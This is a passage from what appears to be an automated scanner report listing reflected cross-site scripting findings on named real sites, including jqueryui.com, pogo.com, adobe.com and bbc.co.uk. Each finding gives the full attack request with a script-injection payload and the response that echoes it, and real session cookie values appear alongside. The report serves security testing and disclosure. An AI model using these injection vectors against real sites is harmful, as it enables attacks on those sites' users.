Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888109dc"><script>alert(1)</script>b91b6da52c2&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.546. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b66d"><script>alert(1)</script>e5fa0150d60 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222222b66d"><script>alert(1)</script>e5fa0150d60&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222222b66d"><script>alert(1)</script>e5fa0150d60&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.547. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0941"><script>alert(1)</script>11047f5e754 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.548. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbf1"><script>alert(1)</script>3e574682b3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?8bbf1"><script>alert(1)</script>3e574682b3b=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&8bbf1"><script>alert(1)</script>3e574682b3b=1" type="text/css" media="all" />
...[SNIP]...

3.549. http://puzzle-games.pogo.com/games/bejeweled2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/bejeweled2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4250"><script>alert(1)</script>e0f9f21b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /games/bejeweled2?a4250"><script>alert(1)</script>e0f9f21b207=1 HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Set-Cookie: prod.JID=D47044E3833B78A6B49653269C3838E6.000016; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606351191133456; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:51 GMT; Path=/
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:25:50 GMT
Server: Apache-Coyote/1.1
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://puzzle-games.pogo.com/games/bejeweled2?a4250"><script>alert(1)</script>e0f9f21b207=1"/>
...[SNIP]...

3.550. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae761"><script>alert(1)</script>e2f6fe1e8ae was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ae761"><script>alert(1)</script>e2f6fe1e8ae&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:25:54 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4332585676645815309&fpid=ae761"><script>alert(1)</script>e2f6fe1e8ae&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.551. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8f9"><script>alert(1)</script>9c556335335 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=4b8f9"><script>alert(1)</script>9c556335335&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:25:54 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2607081141505202903&fpid=4&nu=n&t=&sp=4b8f9"><script>alert(1)</script>9c556335335&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.552. http://revver.com/video/426755/peanut-labs/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://revver.com
Path:	/video/426755/peanut-labs/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05e7"><script>alert(1)</script>a386b442d0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/ HTTP/1.1
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:57:06 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 03:02:22 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT
ETag: 183ed9bf59280eb87751e627ee9c8247
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<form action="/account/login/?next=/video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/" autocomplete="off" method="post">
...[SNIP]...

3.553. http://themeforest.net/user/freshface/portfolio [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f0f8'-alert(1)-'b9a0e02f466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /user9f0f8'-alert(1)-'b9a0e02f466/freshface/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 09 Jan 2011 02:28:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404 Not Found
Content-Length: 20137
Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZDcyYTU2NzhmYjAyMDIyZGUzNzBmZmFlYzk3OTFiMjk%3D--534caac76947ead77491853a9ba47b4217755cb6; path=/; expires=Tue, 08-Jan-2013 14:28:55 GMT; HttpOnly
Cache-Control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="h
...[SNIP]...

_gaq.push(['_setAccount', 'UA-11834194-7']);
_gaq.push(['_setDomainName', '.themeforest.net']);
_gaq.push(['_trackPageview']);

_gaq.push(['_trackEvent', '404', 'http://themeforest.net/user9f0f8'-alert(1)-'b9a0e02f466/freshface/portfolio'])

(function() {
var ga = document.createElement('script');
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.
...[SNIP]...

3.554. http://themeforest.net/user/freshface/portfolio [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3960e</script><script>alert(1)</script>3ad9a7ed78b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /user/freshface3960e</script><script>alert(1)</script>3ad9a7ed78b/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 09 Jan 2011 02:29:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404 Not Found
Content-Length: 20159
Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZTYwMDA5ZmYwMTEwNjA5Y2RmOGQ2NjE1N2U4ZDhlYWQ%3D--1d2e8164d05571132baa11a7ea7b5a052b5d5deb; path=/; expires=Tue, 08-Jan-2013 14:29:00 GMT; HttpOnly
Cache-Control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="h
...[SNIP]...
sh(['_setAccount', 'UA-11834194-7']);
_gaq.push(['_setDomainName', '.themeforest.net']);
_gaq.push(['_trackPageview']);

_gaq.push(['_trackEvent', '404', 'http://themeforest.net/user/freshface3960e</script><script>alert(1)</script>3ad9a7ed78b/portfolio'])

(function() {
var ga = document.createElement('script');
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
g
...[SNIP]...

3.555. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/games/scrabble

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9434a"><script>alert(1)</script>13cdeb03797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1 HTTP/1.1
Host: word-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:29:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 19674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://word-games.pogo.com/games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1"/>
...[SNIP]...

3.556. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://word-games.pogo.com
Path:	/games/scrabble

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bcd"><a>1723ca1944 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble&12bcd"><a>1723ca1944=1 HTTP/1.1
Host: word-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B

Response

3.557. http://www.adobe.com/cfusion/marketplace/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/marketplace/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b21e3"style="x:expression(alert(1))"dd69221e281 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cfusion/marketplace/index.cfm?event=marketplace.home&marketplaceid=1&b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281=1 HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:26:19 GMT
Server: JRun Web Server
Set-Cookie: CFID=6624597;expires=Tue, 01-Jan-2041 05:26:21 GMT;path=/
Set-Cookie: CFTOKEN=1ea7f8d36106d894-1C64D152-DB32-E1EF-D1E224C546139B6B;expires=Tue, 01-Jan-2041 05:26:21 GMT;path=/
Set-Cookie: DYLANSESSIONID=96302d735a59d4ffad14603c651a33927424;path=/
Set-Cookie: UID=1C64D1BA%2D038F%2D108A%2D1AC353CA4DB30BA8;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:26:21 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:26:21 GMT;path=/cfusion
Environment: webapp-da1-11.corp.adobe.com:8300
Content-Language: en-US
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Set-Cookie: DylanApp-BigIP=877425674.27680.0000; path=/
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<a href="/cfusion/marketplace/index.cfm?marketplaceid=1&b21e3"style="x:expression(alert(1))"dd69221e281=1&userid=&event=marketplace.offering&offeringid=19188" class="offeringFeatImg">
...[SNIP]...

3.558. http://www.bbc.co.uk/news/technology-12126880 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bbc.co.uk
Path:	/news/technology-12126880

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b916d'-alert(1)-'0e4cca645e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/technology-12126880?b916d'-alert(1)-'0e4cca645e6=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:38:47 GMT
Keep-Alive: timeout=10, max=777
Expires: Sun, 09 Jan 2011 01:38:47 GMT
Connection: close
Set-Cookie: BBC-UID=b47de209f1919a47a83bc589419fcac7b7ff0f073010c12f22f926c59ac488a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:47 GMT; path=/; domain=bbc.co.uk;
